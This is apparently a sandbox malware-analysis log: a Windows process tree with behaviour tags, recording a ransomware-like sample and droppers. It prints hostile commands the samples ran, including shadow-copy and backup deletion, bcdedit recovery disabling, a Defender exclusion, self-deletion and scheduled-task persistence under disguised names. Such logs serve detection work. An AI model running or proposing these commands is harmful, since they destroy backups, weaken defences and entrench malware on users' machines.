C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1804,12686848925334358805,2685180942203139615,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6492 /prefetch:16⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1804,12686848925334358805,2685180942203139615,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6496 /prefetch:16⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1804,12686848925334358805,2685180942203139615,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3952 /prefetch:16⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1804,12686848925334358805,2685180942203139615,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5956 /prefetch:16⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1804,12686848925334358805,2685180942203139615,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6424 /prefetch:16⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1804,12686848925334358805,2685180942203139615,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7412 /prefetch:16⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1804,12686848925334358805,2685180942203139615,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5676 /prefetch:16⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1804,12686848925334358805,2685180942203139615,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6056 /prefetch:16⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1804,12686848925334358805,2685180942203139615,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2016 /prefetch:16⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1804,12686848925334358805,2685180942203139615,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6304 /prefetch:16⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1804,12686848925334358805,2685180942203139615,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8108 /prefetch:16⤵
-
-
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 356 -p 2464 -ip 24641⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 700 -p 3240 -ip 32401⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 3124 -ip 31241⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 3388 -ip 33881⤵
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 680 -p 2920 -ip 29201⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 772 -p 6768 -ip 67681⤵
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Windows directory
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 809CECF89034B1ACBD923A2A21C66C96 C2⤵
- Loads dropped DLL
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding D8088BDC83AEEF372CDD1DC0A5EAF1B7 C2⤵
- Loads dropped DLL
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 96417E2AB0A7878E51AEA9B9F0B0C6302⤵
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 6723EB252835405500FBE5BEF9CC1D9F C2⤵
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 68DB5BC99D6128523E66756F619FCBB2 C2⤵
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe"2⤵
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe" -silent=1 -CID=717 -SID=717 -submn=default3⤵
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" "--anbfs"4⤵
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exeC:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Cleaner\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" --annotation=plat=Win64 --annotation=prod=Cleaner --annotation=ver=0.0.13 --initial-client-data=0x204,0x208,0x20c,0x1e0,0x210,0x7ff9f67adec0,0x7ff9f67aded0,0x7ff9f67adee05⤵
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=gpu-process --field-trial-handle=2104,16758267539326690555,15529419871842691969,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw508_570764036" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=2120 /prefetch:25⤵
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Cleaner\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=2104,16758267539326690555,15529419871842691969,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw508_570764036" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2436 /prefetch:15⤵
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Cleaner\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=2104,16758267539326690555,15529419871842691969,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw508_570764036" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=2568 /prefetch:15⤵
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2104,16758267539326690555,15529419871842691969,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw508_570764036" --mojo-platform-channel-handle=2180 /prefetch:85⤵
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2104,16758267539326690555,15529419871842691969,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw508_570764036" --mojo-platform-channel-handle=2168 /prefetch:85⤵
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=gpu-process --field-trial-handle=2104,16758267539326690555,15529419871842691969,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw508_570764036" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3188 /prefetch:25⤵
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=2104,16758267539326690555,15529419871842691969,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw508_570764036" --mojo-platform-channel-handle=3504 /prefetch:85⤵
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=2104,16758267539326690555,15529419871842691969,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw508_570764036" --mojo-platform-channel-handle=3220 /prefetch:85⤵
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=2104,16758267539326690555,15529419871842691969,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw508_570764036" --mojo-platform-channel-handle=3212 /prefetch:85⤵
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=2104,16758267539326690555,15529419871842691969,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw508_570764036" --mojo-platform-channel-handle=2032 /prefetch:85⤵
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2104,16758267539326690555,15529419871842691969,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw508_570764036" --mojo-platform-channel-handle=2744 /prefetch:85⤵
- Suspicious use of SetThreadContext
-
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -NoLogo -ExecutionPolicy AllSigned -Command "C:\Users\Admin\AppData\Local\Temp\AI_F049.ps1 -paths 'C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\file_deleter.ps1','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites' -retry_count 10"3⤵
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 6656 -ip 66561⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 784 -p 7320 -ip 73201⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 808 -p 6732 -ip 67321⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Users\Admin\AppData\Local\Temp\CD63.exeC:\Users\Admin\AppData\Local\Temp\CD63.exe1⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 6284 -ip 62841⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 776 -p 6540 -ip 65401⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 256 -ip 2561⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 3432 -ip 34321⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 680 -p 6808 -ip 68081⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Users\Admin\AppData\Local\Temp\EBD9.exeC:\Users\Admin\AppData\Local\Temp\EBD9.exe1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5552 -s 2562⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
C:\Users\Admin\AppData\Local\Temp\2B92.exeC:\Users\Admin\AppData\Local\Temp\2B92.exe1⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1304 -s 4523⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 628 -p 5552 -ip 55521⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 680 -p 1304 -ip 13041⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 680 -p 5316 -ip 53161⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Users\Admin\AppData\Local\Temp\46FB.exeC:\Users\Admin\AppData\Local\Temp\46FB.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\is-U7HHT.tmp\ultramediaburner.tmp"C:\Users\Admin\AppData\Local\Temp\is-U7HHT.tmp\ultramediaburner.tmp" /SL5="$2041E,281924,62464,C:\Program Files\Uninstall Information\YKIFPSDJBJ\ultramediaburner.exe" /VERYSILENT1⤵
- Drops file in Program Files directory
-
C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu2⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 776 -p 6188 -ip 61881⤵
-
C:\Users\Admin\AppData\Local\Temp\705E.exeC:\Users\Admin\AppData\Local\Temp\705E.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\7F53.exeC:\Users\Admin\AppData\Local\Temp\7F53.exe1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 772 -p 7660 -ip 76601⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 668 -p 7352 -ip 73521⤵
-
C:\Users\Admin\AppData\Local\Temp\A79C.exeC:\Users\Admin\AppData\Local\Temp\A79C.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\e1d68de3-7a9f-4011-8ff0-ac8c54857507\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\e1d68de3-7a9f-4011-8ff0-ac8c54857507\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\e1d68de3-7a9f-4011-8ff0-ac8c54857507\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e1d68de3-7a9f-4011-8ff0-ac8c54857507\test.bat"3⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\A79C.exeC:\Users\Admin\AppData\Local\Temp\A79C.exe2⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\A79C.exe" -Force2⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 792 -p 2076 -ip 20761⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s DeviceInstall1⤵
- Suspicious use of SetThreadContext
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{24a36a48-5dde-354b-ba2e-2854b8321529}\oemvista.inf" "9" "4d14a44ff" "0000000000000150" "WinSta0\Default" "0000000000000160" "208" "c:\program files (x86)\maskvpn\driver\win764"2⤵
-
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oem2.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000150" "a49f"2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\DEBB.exeC:\Users\Admin\AppData\Local\Temp\DEBB.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\E62E.exeC:\Users\Admin\AppData\Local\Temp\E62E.exe1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5384 -s 2962⤵
- Program crash
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s NetSetupSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s DsmSvc1⤵
-
C:\Users\Admin\AppData\Local\Temp\ED43.exeC:\Users\Admin\AppData\Local\Temp\ED43.exe1⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\csrss.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\csrss.exe" -start2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C wmic shadowcopy delete3⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic shadowcopy delete4⤵
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C bcdedit /set {default} recoveryenabled no3⤵
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\csrss.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\csrss.exe" -agent 03⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C vssadmin delete shadows /all /quiet3⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C wbadmin delete catalog -quiet3⤵
- Blocklisted process makes network request
- Executes dropped EXE
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures3⤵
-
-
C:\Windows\SysWOW64\notepad.exenotepad.exe3⤵
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵
-
C:\Windows\system32\wbem\WMIADAP.EXEwmiadap.exe /F /T /R1⤵
-
C:\Users\Admin\AppData\Local\Temp\FCE4.exeC:\Users\Admin\AppData\Local\Temp\FCE4.exe1⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im MSBuild.exe /f & timeout /t 6 & del /f /q "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" & del C:\ProgramData\*.dll & exit3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im MSBuild.exe /f4⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 64⤵
- Delays execution with timeout.exe
- Suspicious use of SendNotifyMessage
-
-
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 856 -p 5384 -ip 53841⤵
-
C:\Users\Admin\AppData\Local\Temp\4604.exeC:\Users\Admin\AppData\Local\Temp\4604.exe1⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\u8c2U09Nl2.bat"2⤵
-
C:\Windows\SysWOW64\chcp.comchcp 650013⤵
-
-
C:\Windows\SysWOW64\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:23⤵
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:24⤵
-
-
-
C:\ProgramData\68\fontdrvhost.exe"C:\ProgramData\68\fontdrvhost.exe"3⤵
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵
-
C:\Users\Admin\AppData\Local\Temp\53C1.exeC:\Users\Admin\AppData\Local\Temp\53C1.exe1⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"2⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 836 -p 3824 -ip 38241⤵
-
C:\Users\Admin\AppData\Local\Temp\6E10.exeC:\Users\Admin\AppData\Local\Temp\6E10.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\6E10.exe"C:\Users\Admin\AppData\Local\Temp\6E10.exe"2⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\6E10.exe"3⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK4⤵
- Delays execution with timeout.exe
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\7B40.exeC:\Users\Admin\AppData\Local\Temp\7B40.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7620 -s 8762⤵
- Program crash
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 888 -p 7620 -ip 76201⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 668 -p 6200 -ip 62001⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5824 -s 4603⤵
- Program crash
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 380 -p 5824 -ip 58241⤵
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "GgR9orYdkoaFoTnYbO8e9_1e" /sc ONLOGON /tr "'C:\Users\Admin\Documents\Recently\GgR9orYdkoaFoTnYbO8e9_1e.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "msedge" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy\msedge.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
